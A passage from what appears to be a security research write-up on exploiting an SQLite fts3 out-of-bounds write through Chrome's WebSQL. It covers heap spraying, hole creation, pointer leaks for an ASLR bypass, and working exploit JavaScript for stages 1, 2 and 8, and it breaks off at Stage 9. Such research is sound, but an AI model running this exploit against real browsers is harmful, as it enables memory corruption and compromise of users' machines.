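for (let round = 0; round < 0x1000; round++) {
    toyFree(placeholder, 0xa00);                    // step 4: create the hole
    for (let i = 0; i < 32; i++) toyMalloc(0x10);   // query noise in the busy 0x10 class
    const apple = toyMalloc(0xa00);                 // step 5: apple refills the hole
    appleAddresses.add(apple);
    toyFree(apple, 0xa00);                          // assumption: buffer freed after the query
    placeholder = toyMalloc(0xa00);                 // step 6: plug the hole again
}

console.log(appleAddresses.size);                   // 1
console.log(appleAddresses.has(sprayed[0x80]));     // true
```

In this model the noise never touches the 0xa00 freelist, so apple lands on the placeholder in every round. The real allocator gives no such guarantee, which is why the behaviour had to be confirmed experimentally.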

The entire process is illustrated below.

This strategy makes it possible to corrupt the same address over and over again with different content on each corruption attempt. It is imperative for the OOB write to work repeatedly and reliably, no matter how many times it is executed, in order to move forward to the next stages of exploitation. While experimenting with this strategy, we realized that the OOB write was not reliable when the bug trigger SQL statements were coupled with other SQL statements, such as the heap spray statements. However, when the bug trigger SQL statements were detached into a single transaction and executed separately from any other statements, it worked reliably. Even when the primitive was executed 0x1000 times, not a single attempt had apple stray away from the placeholder, and every attempt wrote out of bounds at the same address.

One thing to note is how the heap manipulating primitives are constructed. To spray the heap with a controlled size and controlled content chunk, a table is created with a single column, and the column name will be the sprayed content. To create holes, the table will be dropped, and the attached column name will be deallocated from the heap. This creates a perfect primitive to create chunks and free them, in a completely controlled manner.
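
As a minimal sketch of these two primitives, the helpers below build the SQL text for a spray and for a hole. The helper names and the table naming scheme are hypothetical and are not the spray function used by the exploit. The name length is derived from the pName->n + pType->n + 2 allocation in sqlite3AddColumn with no column type, and any further allocator overhead is ignored.

```javascript
// Builds a CREATE TABLE statement whose single column name is the sprayed
// content. With no column type, sqlite3AddColumn requests name length + 2
// bytes, so the name is sized to make the request equal allocSize.
function sprayStatement(tableName, allocSize, fillChar) {
    const nameLength = allocSize - 2;
    return `CREATE TABLE ${tableName}(${fillChar.repeat(nameLength)})`;
}

// Builds the statement that frees the column name again, leaving a hole.
function holeStatement(tableName) {
    return `DROP TABLE ${tableName}`;
}

const statements = [];
for (let i = 0; i < 4; i++) {
    statements.push(sprayStatement(`spray_${i}`, 0x20, "A"));
}
statements.push(holeStatement("spray_2"));   // punch a hole in the middle

console.log(statements.join(";\n"));
```

Because column names must be valid identifiers, arbitrary binary content would need quoting or encoding that this sketch does not attempt.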

Another thing worth mentioning is that the chunks are freed and refilled in different phases. For instance, the hole creating primitive frees the column name in the parser phase, whereas the fts table’s term apple is allocated during the execution of the Bytecode Engine. There is a lot of noise between the point where the chunk is freed and the point where apple refills it. To minimize that noise, we upgraded the apple chunk to the 0xa00 size class. Also, as luck would have it, the hole created during DROP TABLE remains on the top of the freelist all the way until apple comes along to pick it back up. This is not always the case, as will be seen in the later stages of exploitation, but the DROP TABLE and apple allocation make a perfect pair for the free/refill.

The entire strategy described above would look something like this in JavaScript.

function create_oob_string(chunk_size, memcpy_offset, payload){
    let target_chunk;
    let chunk_size_adjusted;

    if(chunk_size < 0x1000)
        chunk_size_adjusted = chunk_size - 0x10;
    else
        chunk_size_adjusted = chunk_size - 0x100;
    chunk_size_adjusted /= 2;   // To account for the *2 on realloc

    target_chunk = 'A'.hexEncode().repeat(chunk_size_adjusted);
    let payload_hex = payload.hexEncode();
    let oob_string = `X'00${create_var_int(chunk_size_adjusted)}${target_chunk}03010200${create_var_int(memcpy_offset)}${create_var_int(payload.length)}${payload_hex}03010200'`;

    return oob_string;
}

function create_var_int(number){
    let varint = '';
    let length = 0;
    let current_number = number;

    while(current_number != 0){
        let mask = 0x80;
        let shifted_number = current_number >> 7;

        if(shifted_number == 0){
            mask = 0;
        }
        let current_byte = (current_number & 0x7F) | mask;
        if((current_byte & 0xF0) == 0){
            varint += '0' + current_byte.toString(16);
        }
        else{
            varint += current_byte.toString(16);
        }
        current_number = shifted_number;
        length++;
    }

    return varint;
}

function sploit1() {
    console.log('Stage1 start!');

    var statements = [];

    statements.push("CREATE TABLE debug_table(AAA)");
    statements.push("CREATE VIRTUAL TABLE ft USING fts3");
    statements.push("INSERT INTO ft VALUES('dummy')");

    //statements.push("DROP TABLE debug_table");
    for(var i=0; i<big_boy_spray_count; i++){
        spray(statements, big_boy_spray_size, 1, "A");
    }

    for(var i=0; i<0x100; i++){
        spray(statements, oob_chunk_size, 1, "A");
    }
    saved_index = global_table_index - 0x15;
    reference_saved_index = saved_index;

    runAll(statements, (event) => {
        console.log('Stage1 done');
        sploit2();
    });
}

function sploit2() {
    let statements = [];
    let found_flag = 0;
    let oob_string = create_oob_string(oob_chunk_size, 0x7FFFFFFF, "ZZZZ");

    console.log('Stage2 Start!');

    statements.push(`UPDATE ft_segdir SET root = ${oob_string}`);
    statements.push(`DROP TABLE test${saved_index}`);
    statements.push(`SELECT * FROM ft WHERE ft MATCH 'test'`);
    saved_index = spray(statements, oob_chunk_size, 1, "A");

    function ping_column(current_index){
        let statement = `SELECT ${"A".repeat(0x10000000 - 0x100)}_0 FROM test${current_index}`;
        db.transaction((tx) => {
                tx.executeSql(
                    statement, [],
                    function(sqlTransaction, sqlResultSet) {
                        console.log('success!!!');
                        console.log(`test index : ${current_index}`)
                        if(current_index == big_boy_spray_count-1){
                            found_flag = -1;
                        }
                    },
                    function(sqlTransaction, sqlError) {
                        console.log('fail!!!');
                        console.log(`test index : ${current_index}`)
                        found_flag = 1;
                    }
                );
            },
            dbErr,
            function(){
                if(found_flag == 0){
                    ping_column(current_index + 1);
                }
                else if(found_flag == 1){
                    let corrupted_index = current_index;
                    console.log(`corrupted index : ${corrupted_index}`);
                    sploit3_1(corrupted_index);
                }
                else{
                    console.log(`Stage1 : The column name didn't get corrupted. Something's wrong...?`);
                }
            }
        );
    }

    runAll(statements, (event) => {
            ping_column(0);
            });
}
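
The varint layout that create_var_int emits (7 bits per byte, least significant group first, high bit set on every byte except the last) can be checked with a small round trip. The sketch below is an independent re-implementation for illustration, not the exploit's helper: encodeVarint and decodeVarint are hypothetical names, and unlike create_var_int this encoder returns 00 for the value 0.

```javascript
// Encode a non-negative integer as a hex string of 7-bit groups, low group first.
// Every byte except the last carries the 0x80 continuation bit.
function encodeVarint(value) {
    let hex = "";
    let remaining = value;
    do {
        let byte = remaining & 0x7f;
        remaining = Math.floor(remaining / 0x80);
        if (remaining !== 0) {
            byte |= 0x80;
        }
        hex += byte.toString(16).padStart(2, "0");
    } while (remaining !== 0);
    return hex;
}

// Decode the first varint found at the start of a hex string.
function decodeVarint(hex) {
    let value = 0;
    let scale = 1;
    for (let i = 0; i < hex.length; i += 2) {
        const byte = parseInt(hex.slice(i, i + 2), 16);
        value += (byte & 0x7f) * scale;
        scale *= 0x80;
        if ((byte & 0x80) === 0) {
            break;
        }
    }
    return value;
}

// 0x7FFFFFFF is the memcpy offset used by sploit2 above.
const encodedOffset = encodeVarint(0x7fffffff);
console.log(encodedOffset, decodeVarint(encodedOffset).toString(16));
```

Multiplying and dividing by 0x80 instead of shifting keeps the helpers correct for values above 32 bits, which JavaScript's bitwise operators would truncate.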

Stage 3 ~ Stage 6

In the previous stage, it was mentioned that a divide-and-conquer approach was used. The first stage sprays gigantic 256MB heap chunks, which are 0x10000000 in size. The next stage scales this down by a factor of 0x10 and repeats what the previous stage did with 16MB (0x1000000) chunks. The following illustration describes the entire process.

It’s easy to see where this is going. Stage 4 does the same thing with 0x100000 sized chunks, Stage 5 with 0x10000, and Stage 6 with 0x1000. All of this is to scale down the target chunks until they reach the size 0x1000. The reason is that column object arrays can only grow up to 0xFA00 in size, as mentioned above. Also, the column array is realloc’d for every 8 new columns, which makes it jump all around the place, so to make the problem simpler, 0x1000 was chosen instead of 0x10000. 0x1000 is a big enough size to avoid most of the heap noise.
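
The size schedule of the divide-and-conquer stages is simple arithmetic, and the sketch below just enumerates it under the numbers given in the text: start at 0x10000000, divide by 0x10 per stage, stop at 0x1000. The function name stageChunkSizes is hypothetical.

```javascript
// List the chunk size used by each scale-down step, from largest to smallest.
function stageChunkSizes(initialSize, finalSize, factor) {
    const sizes = [];
    for (let size = initialSize; size >= finalSize; size /= factor) {
        sizes.push(size);
    }
    return sizes;
}

const chunkSizes = stageChunkSizes(0x10000000, 0x1000, 0x10);
for (const size of chunkSizes) {
    console.log(`0x${size.toString(16)} bytes (${size / 1024} KiB)`);
}
```

With these inputs the schedule has five steps, which matches one 256MB spray followed by the four scale-downs of Stages 3 to 6.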

Before proceeding to the next stage, it is worth discussing the sources of failure in this part of the exploit. First, all chunks bigger than 0x8000 come from the Central Cache. This means there is a chance that other threads snatch the pages from the Central Cache before the WebSQL Database thread has a chance to grab them. Fortunately, this doesn’t happen very often. If it does become a problem, there is a way to get rid of it. The first step is to track down the problematic allocation and figure out what size class it is. Next, we would deliberately allocate and free a chunk that matches the size of the problematic chunk, in a way that it doesn’t get coalesced with adjacent chunks. This places the free’d chunk on the Central Cache’s freelist, and when the rogue allocation takes place, the thread that requested it will snatch that chunk from the freelist, leaving the other chunks alone. This problem actually applies to all stages, but it occurs very rarely.

The more frequently occurring problem is the allocation of unintended objects. For instance, all of our heap feng-shui revolves around column names. However, in order to create column names, we have to create a table. When a table is created, lots of objects are allocated on the heap, such as the table object, expression trees, column affinity arrays, the table name string, and the like. These are allocated for every table that is created, so the more tables that are created, the more likely it is that those objects will exhaust their respective size class’s freelist and request new chunks from the Central Cache. When the Central Cache’s freelist is also exhausted, it starts to steal pages that are reserved for large chunks. Those pages include the holes that we wanted to refill, such as Table6’s hole in the above illustration. This is a very real possibility, and when the exploit fails in the first couple of stages, this is the reason most of the time. To fix this, it is necessary to create a really long freelist for all the unintended objects that are allocated upon table creation, and make those objects take chunks from that long freelist. This is somewhat complicated with TCMalloc, because there is a maximum size on the thread cache’s freelist, and if the program reaches that limit, the Central Cache will keep stealing some of the chunks from the thread cache’s freelist. This maximum is dynamically increased as TCMalloc sees a lot of heap activity on that size class’s freelist, but taking full advantage of it requires a deep understanding of the dynamic nature of freelists and a study of how it can be controlled.

A better way to fix this issue would have been to create one gigantic table with 2000 columns, where all columns act as a spray. To create holes, an SQL statement would be issued to rename a column, which frees the previous column name. SQLite actually provides a way to do this (ALTER TABLE RENAME COLUMN, added in SQLite 3.25.0), but unfortunately the version of SQLite that Google used at the time the vulnerability existed was 3.24.0, so that functionality was not yet available in Chrome’s SQLite.

The actual best way to deal with this is to pre-create all tables that will be used in the entire exploit. Whenever the need arises to spray column names, that can be done with the ALTER TABLE ADD COLUMN statement. The exploit does not specifically address this issue, and should be re-run if it fails during this stage.
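
A sketch of what that pre-creation approach could look like as statement builders. This is not part of the exploit: the pre<index> table names, the placeholder column c0, and both helper names are assumptions made for illustration, and the size adjustment simply reuses the one from the exploit's listings.

```javascript
// Create every table up front, so per-table bookkeeping objects are allocated
// before any carefully arranged holes exist.
function precreateTables(count) {
    const statements = [];
    for (let i = 0; i < count; i++) {
        statements.push(`CREATE TABLE pre${i}(c0)`);
    }
    return statements;
}

// Later, spray a column name into an existing table instead of creating a new table.
function sprayViaAddColumn(tableIndex, columnIndex, chunkSize, fillChar) {
    const overhead = chunkSize < 0x1000 ? 0x10 : 0x100;
    const columnName = `${fillChar.repeat(chunkSize - overhead)}_${columnIndex}`;
    return `ALTER TABLE pre${tableIndex} ADD COLUMN ${columnName}`;
}

const setupStatements = precreateTables(2);
const lateSpray = sprayViaAddColumn(0, 1, 0x20, "A");
console.log(setupStatements.join("; "));
console.log(lateSpray);
```

The point of the split is ordering: the noisy allocations happen during setup, and only the column name allocation happens at the moment the spray is needed.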

After all the spraying and corrupting, the entire process up to Stage 6 takes a little over 1 minute in a virtual machine. This is a lot more manageable than 10 minutes. However, 1 minute is still too long to be used in the real world. As the purpose was to create a Proof-of-Concept, the exploit was not optimized further to shave off more time, due to time constraints. Nevertheless, we will discuss ideas on how to eliminate most of the spraying time at the end of the blog post.

Now that everything has been covered, we can proceed to Stage 7.

Stage 7

Stage 7 has only one purpose: place a 0x1000 sized Column Object Array into the corrupted 0x1000 chunk, and find out which of the column objects inside the array is the one that gets corrupted. This is illustrated below.

After this, it is possible to know which of the 104 columns was corrupted. We can keep that corrupted column index bookmarked, and use it to probe the result of all future corruption attempts.

There is a catch here though. What if the corruption happens after the 104 columns, in one of the columns in the range 104 ~ 128? Since no Column object exists in that range, it would be impossible to know which part of the column object array is corrupted. To fix this, when the exploit determines that the OOB write falls into that specific range, it uses a different apple for the OOB write. Specifically, it uses the apple that’s right in front of the current apple.

By using the apple slot that is 0xa00 before the current apple, the corruption falls back into the 0 ~ 104 range, and Stage 7 can be run again to retrieve the corrupted column. This might fail sometimes, because the previous apple block may actually be at a completely random position. When this fails, the exploit should go back to the previous stages, find out which of the other huge blocks of columns got corrupted, and work forwards from there. This is not implemented in the exploit, which should be run again if it fails during this stage.
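
The slot arithmetic behind this fallback can be sketched as follows. Two things here are assumptions rather than facts from the exploit: the 0x20 slot size is inferred from a 0x1000 chunk holding 128 slots, and the write is assumed to land exactly 0xa00 bytes lower when the previous apple is used (which, as noted above, does not always hold). The name planStage7 is hypothetical.

```javascript
const CHUNK_SIZE = 0x1000;   // size of the corrupted chunk
const SLOT_COUNT = 128;      // slots that fit in the chunk
const COLUMN_COUNT = 104;    // slots that actually hold a Column object
const SLOT_SIZE = CHUNK_SIZE / SLOT_COUNT; // 0x20, inferred from the two numbers above
const APPLE_STRIDE = 0xa00;  // assumed distance between adjacent apple slots

// Map a byte offset inside the chunk to a column slot index.
function slotForOffset(offsetInChunk) {
    return Math.floor(offsetInChunk / SLOT_SIZE);
}

// Decide whether the write hits a real column, or whether the previous apple is needed.
function planStage7(offsetInChunk) {
    const slot = slotForOffset(offsetInChunk);
    if (slot < COLUMN_COUNT) {
        return { slot, usePreviousApple: false };
    }
    // Assumption: switching to the previous apple moves the write 0xa00 bytes lower.
    return { slot: slotForOffset(offsetInChunk - APPLE_STRIDE), usePreviousApple: true };
}

console.log(planStage7(0x100)); // lands on a real column
console.log(planStage7(0xe00)); // lands past column 103, so the fallback applies
```

Under these assumptions every slot in the 104 ~ 128 range maps back to a slot between 24 and 47, which is why a single fallback step is enough.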

Before going to the next stage, Stage 7 uses the OOB write to completely wipe the Column Name address field to 0. The reason is that when the table is dropped, SQLite goes through all the column objects in the array and issues tc_free(column_name_address) on each of them. If the address fed to tc_free is not an address that was returned from a previous tc_malloc, the program will crash. Wiping it to 0 makes it call tc_free(0), which is essentially a no-op.

Now that we know which column index was corrupted, we can now proceed to Stage 8.

Stage 8

This is the most fragile part of the exploit.

The first thing that Stage 8 tries to achieve is to drop 3 of the 0x1000 chunks, starting from the corrupted one, and fill them back in with controlled chunks. It relies on the assumption that when the 0x1000 chunks were sprayed in Stage 6, they were all allocated consecutively, back-to-back. In reality, this is not always the case. Sometimes the 0x1000 chunks are allocated sequentially, and then at some point the next allocation suddenly jumps to a random location. This happens frequently with small chunks and rarely with large chunks. The exploit could have been adapted to work on large chunks, but in the current exploitation strategy, the 3 chunks had to include the 104 column object array, placed in the first chunk. The reason is that there must exist a way to place attacker-controlled arbitrary data on the heap. In the course of exploiting the bug, no such primitive was used, because column names, and in fact all names included in an SQL query, are first converted into UTF-8 before they are stored in memory or the database. To get around that, we use the OOB write itself to write an arbitrary payload into memory. This requires everything to be behind the 104 column array, so that the address of the arbitrary data can actually be retrieved and used throughout the exploit. All of this will become clear in Stage 9. We will also discuss how to remove this requirement in Stage 10. We were not particularly happy with the instability in this stage, but we moved forward because the purpose was to prove exploitability. For now, we’ll just assume that the 3 chunks are successfully allocated next to each other.

Now we should discuss which 3 chunks are going to be placed.

  1. The first chunk will hold a table of 104 columns. But this time, the corrupted column will point to a column name that is 0x1000 in size. This column name will be filled with B’s.
  2. The second chunk will be that column name, filled with B’s.
  3. The third chunk will be an Fts3Table object.

This sounds easy on paper, but the layout of the first two chunks is more complicated than it sounds. Since those two chunks are created in a single CREATE TABLE query, the freelist has to be constructed carefully so that the two allocations are placed in that exact order. To make things even more complicated, the freelist is scrambled depending on which column index was corrupted. Therefore, the freelist must be massaged in different ways for different column indexes. This was solved by deliberately creating holes, deliberately plugging existing holes at different positions in the freelist, changing the order of allocations and frees, and adding garbage columns just to compensate for unwanted holes in the freelist. This had to be tested for every index in the column array, and was a tedious process. The end result looks roughly like this.

function spray_custom_column3(statements, size, times, repeat_char, column_index, column_size){
    let size_adjusted;
    let column_name;

    if(size < 0x1000)
        size_adjusted = size - 0x10;
    else
        size_adjusted = size - 0x100;

    if(column_index == 0)
        column_name = `${repeat_char.repeat(column_size - 0x100)}_0`;
    else
        column_name = `${repeat_char.repeat(size_adjusted)}_0`;
    for(var i=1; i<times; i++){
        if(column_index >= 0 && column_index < 40){
            //if((column_index+0 == i) || (column_index+1 == i) || (column_index+2 == i))
            if(((column_index + 0) == i) || ((column_index + 1) == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
        else if(column_index >= 40 && column_index < 80){
            if((column_index+0 == i) || (column_index+1 == i) || (column_index-1 == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
        else if(column_index == 80){
            if(((column_index + 0) == i) || ((column_index + 1) == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
        else if(column_index >= 88 && column_index < 104){
            if(((column_index + 0) == i) || ((column_index + 1) == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
        else{
            if(((column_index + 0) == i) || ((column_index + 1) == i))
                column_name += `, ${repeat_char.repeat(column_size - 0x100)}_${i}`;
            else
                column_name += `, ${repeat_char.repeat(size_adjusted)}_${i}`;
        }
    }
    statements.push(`CREATE TABLE test${global_table_index}(${column_name})`);
    global_table_index++;

    return global_table_index-1;
}

function sploit8_1() {
    let statements = [];

    console.log('Stage8-1 Start!');

    if(corrupted_column != 80){
        statements.push(`DROP TABLE test${target_table_index}`);
        statements.push(`DROP TABLE test${reference_table_index+1}`);
    }
    else{
        let temp_index = global_table_index;
        ft3_spray(statements, 0xD80, "AAAA");
        statements.push(`DROP TABLE test${reference_table_index+1}`);
        statements.push(`DROP TABLE test${temp_index}`);
        statements.push(`DROP TABLE test${target_table_index}`);
    }

    target_table_index = global_table_index;
    spray_custom_column3(statements, 0x14, 104, "B", corrupted_column, 0x1000);
    statements.push(`DROP TABLE test${reference_table_index+2}`);
    code_execution_table_index = global_table_index;
    ft3_spray(statements, 0xD80, "AAAA");

    // Just for good measure. In case there are any holes left behind
    ft3_spray(statements, 0xD80, "AAAA");
    ft3_spray(statements, 0xD80, "AAAA");
    ft3_spray(statements, 0xD80, "AAAA");
    ft3_spray(statements, 0xD80, "AAAA");

    runAll(statements, (event) => {
        sploit8_2();
    });
}

There could be a better way to do this, but this was how it was done. The alternative exploitation strategy discussed in Stage 10 removes the need for this laborious task, so future versions of the exploit should use that strategy instead. Now chunk 1 and chunk 2 are covered. Chunk 3 introduces a new object called Fts3Table. This object is created during the execution of a CREATE VIRTUAL TABLE fts3() query. Let’s take a glimpse at the function that is responsible for creating that object.

static const sqlite3_module fts3Module = {
  /* iVersion      */ 2,
  /* xCreate       */ fts3CreateMethod,
  /* xConnect      */ fts3ConnectMethod,
  /* xBestIndex    */ fts3BestIndexMethod,
  /* xDisconnect   */ fts3DisconnectMethod,
  /* xDestroy      */ fts3DestroyMethod,
  /* xOpen         */ fts3OpenMethod,
  /* xClose        */ fts3CloseMethod,
  /* xFilter       */ fts3FilterMethod,
  /* xNext         */ fts3NextMethod,
  /* xEof          */ fts3EofMethod,
  /* xColumn       */ fts3ColumnMethod,
  /* xRowid        */ fts3RowidMethod,
  /* xUpdate       */ fts3UpdateMethod,
  /* xBegin        */ fts3BeginMethod,
  /* xSync         */ fts3SyncMethod,
  /* xCommit       */ fts3CommitMethod,
  /* xRollback     */ fts3RollbackMethod,
  /* xFindFunction */ fts3FindFunctionMethod,
  /* xRename */       fts3RenameMethod,
  /* xSavepoint    */ fts3SavepointMethod,
  /* xRelease      */ fts3ReleaseMethod,
  /* xRollbackTo   */ fts3RollbackToMethod,
};

static int fts3CreateMethod(
  sqlite3 *db,                    /* Database connection */
  void *pAux,                     /* Pointer to tokenizer hash table */
  int argc,                       /* Number of elements in argv array */
  const char * const *argv,       /* xCreate/xConnect argument array */
  sqlite3_vtab **ppVtab,          /* OUT: New sqlite3_vtab object */
  char **pzErr                    /* OUT: sqlite3_malloc'd error message */
){
  return fts3InitVtab(1, db, pAux, argc, argv, ppVtab, pzErr);
}

static int fts3InitVtab(
  int isCreate,                   /* True for xCreate, false for xConnect */
  sqlite3 *db,                    /* The SQLite database connection */
  void *pAux,                     /* Hash table containing tokenizers */
  int argc,                       /* Number of elements in argv array */
  const char * const *argv,       /* xCreate/xConnect argument array */
  sqlite3_vtab **ppVTab,          /* Write the resulting vtab structure here */
  char **pzErr                    /* Write any error message here */
){
  Fts3Hash *pHash = (Fts3Hash *)pAux;
  Fts3Table *p = 0;               /* Pointer to allocated vtab */
  int rc = SQLITE_OK;             /* Return code */

  // snipped for brevity

  nByte = sizeof(Fts3Table) +                  /* Fts3Table */
          nCol * sizeof(char *) +              /* azColumn */
          nIndex * sizeof(struct Fts3Index) +  /* aIndex */
          nCol * sizeof(u8) +                  /* abNotindexed */
          nName +                              /* zName */
          nDb +                                /* zDb */
          nString;                             /* Space for azColumn strings */
  p = (Fts3Table*)sqlite3_malloc(nByte);
  if( p==0 ){
    rc = SQLITE_NOMEM;
    goto fts3_init_out;
  }
  memset(p, 0, nByte);
  p->db = db;
  p->nColumn = nCol;
  p->nPendingData = 0;
  p->azColumn = (char **)&p[1];
  p->pTokenizer = pTokenizer;
  p->nMaxPendingData = FTS3_MAX_PENDING_DATA;
  p->bHasDocsize = (isFts4 && bNoDocsize==0);
  p->bHasStat = (u8)isFts4;
  p->bFts4 = (u8)isFts4;
  p->bDescIdx = (u8)bDescIdx;
  p->nAutoincrmerge = 0xff;   /* 0xff means setting unknown */
  p->zContentTbl = zContent;
  p->zLanguageid = zLanguageid;

  // snipped for brevity

  /* Fill in the azColumn array */
  for(iCol=0; iCol<nCol; iCol++){
    char *z;
    int n = 0;
    z = (char *)sqlite3Fts3NextToken(aCol[iCol], &n);
    if( n>0 ){
      memcpy(zCsr, z, n);
    }
    zCsr[n] = '\0';
    sqlite3Fts3Dequote(zCsr);
    p->azColumn[iCol] = zCsr;
    zCsr += n+1;
    assert( zCsr <= &((char *)p)[nByte] );
  }

  // snipped for brevity
}

/*
** A connection to a fulltext index is an instance of the following
** structure. The xCreate and xConnect methods create an instance
** of this structure and xDestroy and xDisconnect free that instance.
** All other methods receive a pointer to the structure as one of their
** arguments.
*/
struct Fts3Table {
  sqlite3_vtab base;              /* Base class used by SQLite core */
  sqlite3 *db;                    /* The database connection */
  const char *zDb;                /* logical database name */
  const char *zName;              /* virtual table name */
  int nColumn;                    /* number of named columns in virtual table */
  char **azColumn;                /* column names.  malloced */
  u8 *abNotindexed;               /* True for 'notindexed' columns */
  sqlite3_tokenizer *pTokenizer;  /* tokenizer for inserts and queries */
  char *zContentTbl;              /* content=xxx option, or NULL */
  char *zLanguageid;              /* languageid=xxx option, or NULL */
  int nAutoincrmerge;             /* Value configured by 'automerge' */
  u32 nLeafAdd;                   /* Number of leaf blocks added this trans */

  /* Precompiled statements used by the implementation. Each of these
  ** statements is run and reset within a single virtual table API call.
  */
  sqlite3_stmt *aStmt[40];
  sqlite3_stmt *pSeekStmt;        /* Cache for fts3CursorSeekStmt() */

  char *zReadExprlist;
  char *zWriteExprlist;

  int nNodeSize;                  /* Soft limit for node size */
  u8 bFts4;                       /* True for FTS4, false for FTS3 */
  u8 bHasStat;                    /* True if %_stat table exists (2==unknown) */
  u8 bHasDocsize;                 /* True if %_docsize table exists */
  u8 bDescIdx;                    /* True if doclists are in reverse order */
  u8 bIgnoreSavepoint;            /* True to ignore xSavepoint invocations */
  int nPgsz;                      /* Page size for host database */
  char *zSegmentsTbl;             /* Name of %_segments table */
  sqlite3_blob *pSegments;        /* Blob handle open on %_segments table */

  int nIndex;                     /* Size of aIndex[] */
  struct Fts3Index {
    int nPrefix;                  /* Prefix length (0 for main terms index) */
    Fts3Hash hPending;            /* Pending terms table for this index */
  } *aIndex;
  int nMaxPendingData;            /* Max pending data before flush to disk */
  int nPendingData;               /* Current bytes of pending data */
  sqlite_int64 iPrevDocid;        /* Docid of most recently inserted document */
  int iPrevLangid;                /* Langid of recently inserted document */
  int bPrevDelete;                /* True if last operation was a delete */
};

struct sqlite3_vtab {
  const sqlite3_module *pModule;  /* The module for this virtual table */
  int nRef;                       /* Number of open cursors */
  char *zErrMsg;                  /* Error message from sqlite3_mprintf() */
  /* Virtual table implementations will typically add additional fields */
};

There are several noteworthy things in this function. First, the Fts3Table object is dynamically sized. It is sized to encompass all of the column names, which get stored in the object itself. Because column names are user controlled, the entire size of the Fts3Table is user controlled. This means that we can place an Fts3Table chunk into a size-class freelist of our choosing. Next, there is a member, azColumn, which points somewhere inside the object itself. If this value can be leaked, it can be used to calculate the object’s address. Next, there is a member called base. This base member is a struct, which has another member called pModule. This pModule member points into the .data section of the SQLite library. By leaking this address, it is possible to bypass ASLR. Finally, there is a member called db. This points to an sqlite3 object, which is allocated when the WebSQL database is first opened. This occurs very early in the exploitation process, so we can expect this object to be somewhere near the beginning of the heap. All of these object fields will be utilized later on during exploitation.
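
Both address calculations are plain subtractions, sketched below with BigInt so that 64-bit values stay exact. The first relies on p->azColumn = (char **)&p[1] from the listing, which places azColumn immediately after the Fts3Table struct. All concrete numbers (the struct size, the offset of fts3Module inside the library, and the leaked values) are made-up placeholders, since the real ones depend on the specific build.

```javascript
// azColumn points just past the struct, so subtracting sizeof(Fts3Table)
// gives the address of the Fts3Table object itself.
function fts3TableAddress(leakedAzColumn, sizeofFts3Table) {
    return leakedAzColumn - sizeofFts3Table;
}

// pModule points at fts3Module inside the library's data, so subtracting that
// symbol's offset gives the library's load address.
function libraryBase(leakedPModule, fts3ModuleOffset) {
    return leakedPModule - fts3ModuleOffset;
}

// Placeholder values for illustration only; none of them come from a real target.
const HYPOTHETICAL_SIZEOF_FTS3TABLE = 0x200n;
const HYPOTHETICAL_FTS3MODULE_OFFSET = 0x1a2b40n;

const tableAddress = fts3TableAddress(0x7f0012341200n, HYPOTHETICAL_SIZEOF_FTS3TABLE);
const base = libraryBase(0x7f00aa1a2b40n, HYPOTHETICAL_FTS3MODULE_OFFSET);
console.log(`Fts3Table at 0x${tableAddress.toString(16)}, library base 0x${base.toString(16)}`);
```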

For now, we just want this Fts3Table object to be allocated as the third chunk. As mentioned above, since the column name actually goes into the Fts3Table object, the size is completely controlled, so we can make it use the 0x1000 size freelist. However, there is one thing to keep in mind: because an fts3 table is also just a regular table, a Table object is created before the Fts3Table object. This means that the column name is actually stored in 2 places, which would create two 0x1000 chunks. That is undesirable. To get around this issue, we need the column name of the Table object to use a freelist other than the 0x1000 freelist. The boundary for a chunk being placed in the 0x1000 freelist is 0xD00. Any chunk smaller than that is placed in the 0xD00 freelist. Therefore, we can create an fts3 table with a column name that is smaller than 0xD00, and that column name will take a chunk from the 0xD00 freelist. On the other hand, the combined size of the Fts3Table object, calculated above in line 53 of the listing (the nByte sum in fts3InitVtab), is bigger than 0xD00, making it grab a chunk from the 0x1000 freelist. Problem solved. Now the Fts3Table object can be nicely placed in the third chunk.
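
To make the size-class trick concrete, the sketch below mirrors the nByte sum from fts3InitVtab and checks which of the two freelists each allocation would use. Several inputs are assumptions: the struct sizes (0x200 and 0x30) are placeholders, pointers are taken to be 8 bytes, allocator headers are ignored, and the model only knows the two size classes named in the text, treating exactly 0xD00 as belonging to the 0xD00 class.

```javascript
const SIZE_CLASS_BOUNDARY = 0xd00; // boundary quoted in the text

// Only models the two classes discussed here; other sizes are out of scope.
function freelistFor(allocationSize) {
    if (allocationSize > 0x1000) {
        throw new RangeError("size is outside the two modelled classes");
    }
    return allocationSize <= SIZE_CLASS_BOUNDARY ? 0xd00 : 0x1000;
}

// Mirrors the nByte computation in fts3InitVtab (8-byte pointers, 1-byte u8).
function estimateFts3TableBytes(s) {
    return s.sizeofFts3Table + s.nCol * 8 + s.nIndex * s.sizeofFts3Index +
           s.nCol * 1 + s.nName + s.nDb + s.nString;
}

const columnNameLength = 0xc00;              // chosen to stay below the boundary
const tableCopyBytes = columnNameLength + 1; // the regular Table's copy, with its NUL

const fts3Bytes = estimateFts3TableBytes({
    sizeofFts3Table: 0x200,   // placeholder, not the real sizeof
    sizeofFts3Index: 0x30,    // placeholder, not the real sizeof
    nCol: 1,
    nIndex: 1,
    nName: 3,                 // "ft" plus NUL
    nDb: 5,                   // "main" plus NUL
    nString: columnNameLength + 1,
});

console.log(`Table copy: 0x${tableCopyBytes.toString(16)} -> 0x${freelistFor(tableCopyBytes).toString(16)} freelist`);
console.log(`Fts3Table:  0x${fts3Bytes.toString(16)} -> 0x${freelistFor(fts3Bytes).toString(16)} freelist`);
```

The fixed overhead of the Fts3Table struct is what pushes the second allocation over the boundary while the bare column name stays under it.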

The following illustration shows what happens next in Stage 8.

Now we know the 1st, 2nd, and 3rd byte of the second chunk’s address. We will not bruteforce the 4th byte just yet, because there is a risk of hitting unmapped memory when bruteforcing it without knowing the byte’s range. Instead, we will proceed to leak the 5th, and 6th byte in Stage 9.

Stage 9

